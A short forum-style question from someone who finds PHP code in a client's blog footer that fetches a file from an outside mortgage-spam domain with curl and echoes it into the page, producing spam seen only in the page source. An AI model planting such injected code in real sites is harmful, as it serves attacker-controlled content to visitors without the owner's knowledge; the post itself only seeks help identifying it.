I looked in the footer of a blog I installed for a client and saw this code:
<? php $url = "http://select-your-mortgage.com/file.txt";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
echo $result = curl_exec($ch);
There wasn't any visible spam on the page, but when I viewed the source, there was tons of it. Is that some kind of hidden spam attack?